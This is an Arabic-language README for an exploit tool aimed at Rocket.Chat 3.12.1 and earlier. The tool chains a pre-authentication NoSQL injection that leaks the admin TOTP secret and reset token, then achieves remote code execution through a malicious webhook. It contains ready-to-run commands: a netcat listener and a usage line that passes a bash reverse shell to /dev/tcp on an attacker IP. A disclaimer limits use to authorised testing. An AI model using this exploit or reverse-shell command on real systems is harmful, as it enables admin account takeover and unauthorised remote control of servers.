
استغلال لـ Rocket.Chat 3.12.1 RCE عبر حقن NoSQL قبل المصادقة، يسرب سر TOTP الخاص بالمسؤول ورمز إعادة تعيين كلمة المرور لتحقيق تنفيذ الأكواد عن بُعد من خلال تكامل webhook خبيث.
يستغل ثغرة حقن NoSQL قبل المصادقة في Rocket.Chat 3.12.1 لتسريب سر TOTP الخاص بالمسؤول ورمز إعادة تعيين كلمة المرور، والاستيلاء على حساب المسؤول، وتحقيق تنفيذ الأوامر عن بُعد (RCE) عبر تكامل webhook خبيث.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
قبل تشغيل الأداة، ابدأ مستمع netcat في طرفية منفصلة لالتقاط القشرة العكسية الواردة:
nc -lvnp 4444
أبقِ هذه الطرفية مفتوحة. بمجرد نجاح تشغيل الأداة، ستظهر القشرة هنا.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
| Flag | الوصف |
|---|---|
-t | عنوان URL المستهدف لـ Rocket.Chat |
-u | اسم المستخدم المسجّل بصلاحيات منخفضة |
-p | كلمة المرور المسجّلة بصلاحيات منخفضة |
-e | البريد الإلكتروني للمسؤول |
-a | اسم مستخدم المسؤول |
-c | أمر القشرة العكسية |
-v | الوضع المفصّل (يعرض الاستجابات الخام) |
$where$whereهذه الأداة مخصصة للأغراض التعليمية ولاختبار الاختراق المصرح به فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. احصل دائمًا على إذن كتابي مناسب قبل الاختبار.